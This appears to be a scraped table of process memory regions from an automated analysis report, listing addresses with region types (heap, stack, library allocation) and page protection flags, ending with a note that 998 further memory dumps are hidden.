trusted library allocation
page read and write
268F8970000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
268F87E2000
heap
page read and write
1B7F6000
heap
page read and write
B40000
heap
page read and write
AB0000
heap
page read and write
167751C0000
heap
page readonly
38B3E73000
stack
page read and write
7FFD9B8D0000
trusted library allocation
page execute and read and write
268E0C06000
trusted library allocation
page read and write
F6D64BE000
stack
page read and write
C2DC9BF000
stack
page read and write
38B43F9000
stack
page read and write
F6D617D000
stack
page read and write
2BCBF1B6000
heap
page execute and read and write
2BCB6EE9000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
16700BF8000
trusted library allocation
page read and write
268E1786000
trusted library allocation
page read and write
B6F000
heap
page read and write
7FFD9B72C000
trusted library allocation
page execute and read and write
F6D5FF9000
stack
page read and write
7FFD9B6B3000
trusted library allocation
page execute and read and write
29B9EE000
stack
page read and write
12DE1000
trusted library allocation
page read and write
7FFD9B860000
trusted library allocation
page execute and read and write
B65000
heap
page read and write
38B4FCF000
stack
page read and write
11808D29000
trusted library allocation
page read and write
2C30000
heap
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
11809469000
trusted library allocation
page read and write
11806590000
trusted library allocation
page read and write
7FFD9B8C2000
trusted library allocation
page read and write
268DFF20000
heap
page read and write
16775215000
heap
page read and write
167738D4000
heap
page read and write
11820604000
heap
page read and write
C2DC7FF000
stack
page read and write
16775AF4000
heap
page read and write
167758F2000
heap
page read and write
7FFD9B8C2000
trusted library allocation
page read and write
2BCA8492000
trusted library allocation
page read and write
2BCB6C01000
trusted library allocation
page read and write
1C59F000
stack
page read and write
268F02EB000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page execute and read and write
7FFD9BA45000
trusted library allocation
page read and write
118063F0000
heap
page read and write
1B7AE000
stack
page read and write
268F88BA000
heap
page read and write
2939000
trusted library allocation
page read and write
16701784000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
7FFD9B6FB000
trusted library allocation
page read and write
1182051E000
heap
page read and write
167753AB000
heap
page read and write
268E0229000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
268F030A000
trusted library allocation
page read and write
16700DB5000
trusted library allocation
page read and write
268F85C0000
heap
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9BA18000
trusted library allocation
page read and write
268DFFE0000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
2BCBF374000
heap
page read and write
7DF4879B0000
trusted library allocation
page execute and read and write
11820659000
heap
page read and write
2BCBF2D4000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
16775250000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
2BCA8A2A000
trusted library allocation
page read and write
1180646D000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
1B50F000
stack
page read and write
268E0001000
trusted library allocation
page read and write
7FFD9B8D0000
trusted library allocation
page execute and read and write
2BCB6C10000
trusted library allocation
page read and write
1C5AB000
heap
page read and write
268DE660000
trusted library allocation
page read and write
2BCBF091000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
2BCBF2C0000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B786000
trusted library allocation
page read and write
7FFD9BA3C000
trusted library allocation
page read and write
16775C48000
heap
page read and write
7FFD9B73C000
trusted library allocation
page execute and read and write
29C47B000
stack
page read and write
11820990000
heap
page read and write
1C260000
heap
page read and write
C2DC779000
stack
page read and write
7FFD9BA13000
trusted library allocation
page read and write
1677388D000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
268DE468000
heap
page read and write
1670102F000
trusted library allocation
page read and write
F6D700C000
stack
page read and write
F70000
heap
page read and write
E6E000
stack
page read and write
7FFD9BA4C000
trusted library allocation
page read and write
12DE8000
trusted library allocation
page read and write
16775DA0000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1C12E000
stack
page read and write
7FFD9B881000
trusted library allocation
page read and write
167758F4000
heap
page read and write
2BCA7985000
trusted library allocation
page read and write
7FFD9BA03000
trusted library allocation
page read and write
7FFD9B891000
trusted library allocation
page read and write
16701890000
trusted library allocation
page read and write
2BCA7B62000
trusted library allocation
page read and write
16710072000
trusted library allocation
page read and write
268E1E25000
trusted library allocation
page read and write
2BCBF0BB000
heap
page read and write
1B60E000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9B6B0000
trusted library allocation
page read and write
B80000
heap
page read and write
A00000
heap
page read and write
29CECC000
stack
page read and write
268E1009000
trusted library allocation
page read and write
7FFD9B700000
trusted library allocation
page read and write
2D3F000
stack
page read and write
7DF468850000
trusted library allocation
page execute and read and write
1C0E3000
stack
page read and write
1C45A000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
268E12E0000
trusted library allocation
page read and write
7FFD9BB36000
trusted library allocation
page read and write
7FFD9B7D0000
trusted library allocation
page execute and read and write
7FFD9B8D0000
trusted library allocation
page read and write
FE0000
trusted library allocation
page read and write
2BCA7CFB000
trusted library allocation
page read and write
268F0001000
trusted library allocation
page read and write
7FFD9BA29000
trusted library allocation
page read and write
268DFFD0000
heap
page execute and read and write
268F026E000
trusted library allocation
page read and write
C2DD80E000
stack
page read and write
2BCA780D000
trusted library allocation
page read and write
2BCA8386000
trusted library allocation
page read and write
16775220000
trusted library allocation
page read and write
16710021000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
118065C0000
heap
page readonly
1BEEE000
stack
page read and write
7FFD9B882000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1181838B000
trusted library allocation
page read and write
1CAA0000
heap
page read and write
16710001000
trusted library allocation
page read and write
16773850000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1B710000
heap
page read and write
7FFD9BA13000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
11818112000
trusted library allocation
page read and write
2BCA5063000
heap
page read and write
F70000
heap
page read and write
1290000
heap
page read and write
29C2FE000
stack
page read and write
2BCA52C5000
heap
page read and write
7FFD9B6B0000
trusted library allocation
page read and write
16710011000
trusted library allocation
page read and write
16701387000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
1B67E000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
16775ABA000
heap
page read and write
29BF7B000
stack
page read and write
1C998000
stack
page read and write
118204E6000
heap
page execute and read and write
2BCA7B77000
trusted library allocation
page read and write
7FFD9B6E4000
trusted library allocation
page read and write
167739A0000
heap
page read and write
1315000
heap
page read and write
1677388F000
heap
page read and write
268DFE80000
trusted library allocation
page read and write
29C27E000
stack
page read and write
167011D8000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
2BCBF40B000
heap
page read and write
7FFD9B872000
trusted library allocation
page read and write
11820420000
heap
page read and write
2BCA6BF0000
heap
page read and write
268F02F8000
trusted library allocation
page read and write
118065E0000
heap
page read and write
1182048B000
heap
page read and write
118204C8000
heap
page read and write
11808C8B000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
10B0000
heap
page read and write
2BCA5010000
trusted library section
page read and write
7FFD9BB3D000
trusted library allocation
page read and write
268F872C000
heap
page read and write
7DF468840000
trusted library allocation
page execute and read and write
2DD0000
heap
page execute and read and write
118065D0000
trusted library allocation
page read and write
1B70C000
stack
page read and write
2BCA7F13000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
1677389B000
heap
page read and write
268DE4EA000
heap
page read and write
7FFD9B750000
trusted library allocation
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
2BCA5065000
heap
page read and write
F6D63BB000
stack
page read and write
268DE6A0000
trusted library allocation
page read and write
7FFD9B6EB000
trusted library allocation
page read and write
16775C2B000
heap
page read and write
16775AB0000
heap
page read and write
FC0000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
B1E000
heap
page read and write
1CA9C000
stack
page read and write
2BCBF08F000
heap
page read and write
16700072000
trusted library allocation
page read and write
268E1312000
trusted library allocation
page read and write
2BCA7EE0000
trusted library allocation
page read and write
10AF000
heap
page read and write
268F8465000
heap
page read and write
AF3000
heap
page read and write
268DE49D000
heap
page read and write
11809931000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
38B4277000
stack
page read and write
F6D65BC000
stack
page read and write
16775210000
heap
page read and write
167102EF000
trusted library allocation
page read and write
AF0000
heap
page read and write
7FFD9B89A000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
38B457E000
stack
page read and write
167010BF000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1670133B000
trusted library allocation
page read and write
268DE3F0000
heap
page read and write
16710309000
trusted library allocation
page read and write
11808060000
heap
page execute and read and write
118204B8000
heap
page read and write
1C5A8000
heap
page read and write
167103A8000
trusted library allocation
page read and write
7FFD9B6A4000
trusted library allocation
page read and write
B27000
heap
page read and write
11809169000
trusted library allocation
page read and write
16775991000
heap
page read and write
2BCBF170000
trusted library allocation
page read and write
268E0F9B000
trusted library allocation
page read and write
7FFD9BADC000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B894000
trusted library allocation
page read and write
7FFD9B79C000
trusted library allocation
page execute and read and write
7FFD9BA4C000
trusted library allocation
page read and write
29BE000
stack
page read and write
10A4000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1115000
heap
page read and write
268F8810000
heap
page read and write
1CAA3000
heap
page read and write
1BC4E000
stack
page read and write
11809825000
trusted library allocation
page read and write
268DE4BD000
heap
page read and write
2DE1000
trusted library allocation
page read and write
38B524E000
stack
page read and write
1180990A000
trusted library allocation
page read and write
B74000
heap
page read and write
268DE6D5000
heap
page read and write
11806504000
heap
page read and write
1040000
heap
page read and write
16775330000
heap
page execute and read and write
7FFD9B930000
trusted library allocation
page read and write
2BCBF2D0000
heap
page read and write
7FFD9BA34000
trusted library allocation
page read and write
7FFD9B8B8000
trusted library allocation
page read and write
1310000
heap
page read and write
2946000
trusted library allocation
page read and write
F6D7109000
stack
page read and write
1B470000
heap
page execute and read and write
268E182C000
trusted library allocation
page read and write
29C178000
stack
page read and write
11807EC0000
heap
page read and write
38B437A000
stack
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
11808E1D000
trusted library allocation
page read and write
2BCBF650000
heap
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
C5A000
heap
page read and write
118205FC000
heap
page read and write
2BCBF1E0000
heap
page read and write
29CF47000
stack
page read and write
7FFD9BAF0000
trusted library allocation
page execute and read and write
1677593B000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
1AC50000
heap
page read and write
7FFD9B882000
trusted library allocation
page read and write
7FFD9B7C6000
trusted library allocation
page execute and read and write
38B4179000
stack
page read and write
16775380000
trusted library allocation
page read and write
29D04D000
stack
page read and write
29BFFE000
stack
page read and write
29C0F7000
stack
page read and write
2DEC000
trusted library allocation
page read and write
29BDFF000
stack
page read and write
1070000
heap
page read and write
129F3000
trusted library allocation
page read and write
B82000
heap
page read and write
7FFD9B920000
trusted library allocation
page read and write
2BCA7CC7000
trusted library allocation
page read and write
11806510000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
118180C1000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
BA8000
heap
page read and write
268E112A000
trusted library allocation
page read and write
7FFD9B8C4000
trusted library allocation
page read and write
7FFD9BA09000
trusted library allocation
page read and write
2BCA7B66000
trusted library allocation
page read and write
268F84D5000
heap
page read and write
1180644F000
heap
page read and write
7FFD9B8C8000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
268F0010000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
268F8774000
heap
page read and write
C2DCD3B000
stack
page read and write
F6D720E000
stack
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
7FFD9B9A0000
trusted library allocation
page read and write
2BCB6EF8000
trusted library allocation
page read and write
2BCA6BF5000
heap
page read and write
7DF485990000
trusted library allocation
page execute and read and write
7FFD9B6CD000
trusted library allocation
page execute and read and write
2BCA51F0000
trusted library section
page read and write
1182072F000
heap
page read and write
2BCA506B000
heap
page read and write
12E0000
trusted library allocation
page read and write
2BCA7B6A000
trusted library allocation
page read and write
2BCBF463000
heap
page read and write
2BCA7C9B000
trusted library allocation
page read and write
7FFD9B6C4000
trusted library allocation
page read and write
167738AB000
heap
page read and write
F5D000
stack
page read and write
268F888E000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
E50000
heap
page read and write
11818399000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
167104B8000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1BBAE000
stack
page read and write
268F879B000
heap
page read and write
F6F000
stack
page read and write
7FFD9B940000
trusted library allocation
page read and write
7FFD9B9EF000
trusted library allocation
page read and write
118205F8000
heap
page read and write
167758B0000
heap
page read and write
268E0D72000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
29C1F9000
stack
page read and write
268E007A000
trusted library allocation
page read and write
2BCA8553000
trusted library allocation
page read and write
2BCA7652000
trusted library allocation
page read and write
2BCBF449000
heap
page read and write
2BCB6C21000
trusted library allocation
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
ABC000
heap
page read and write
2BCA7C7C000
trusted library allocation
page read and write
2BCA8A25000
trusted library allocation
page read and write
2BCB6F08000
trusted library allocation
page read and write
16773970000
heap
page read and write
B60000
heap
page read and write
F6D708A000
stack
page read and write
7FFD9B796000
trusted library allocation
page read and write
7FFD9BADC000
trusted library allocation
page read and write
11820632000
heap
page read and write
7FFD9B920000
trusted library allocation
page read and write
268F8720000
heap
page read and write
268E1897000
trusted library allocation
page read and write
7FFD9B6FB000
trusted library allocation
page read and write
7FFD9B7B6000
trusted library allocation
page execute and read and write
1B8A0000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
38B504C000
stack
page read and write
10B2000
heap
page read and write
7FFD9B6D2000
trusted library allocation
page read and write
7FFD9BB2D000
trusted library allocation
page read and write
167751B0000
trusted library allocation
page read and write
2BCA4FF0000
heap
page read and write
7FFD9BB3D000
trusted library allocation
page read and write
11820524000
heap
page read and write
11820608000
heap
page read and write
7FFD9B898000
trusted library allocation
page read and write
16775B00000
heap
page read and write
7DF4E7EC0000
trusted library allocation
page execute and read and write
2BCA6B00000
heap
page execute and read and write
167102F7000
trusted library allocation
page read and write
38B51CC000
stack
page read and write
7FFD9B900000
trusted library allocation
page read and write
2BCA505F000
heap
page read and write
167018F3000
trusted library allocation
page read and write
1677594E000
heap
page read and write
16775C05000
heap
page read and write
29FF000
trusted library allocation
page read and write
16775390000
heap
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page read and write
16700229000
trusted library allocation
page read and write
7FFD9BA32000
trusted library allocation
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
16701122000
trusted library allocation
page read and write
There are 998 hidden memdumps, click here to show them.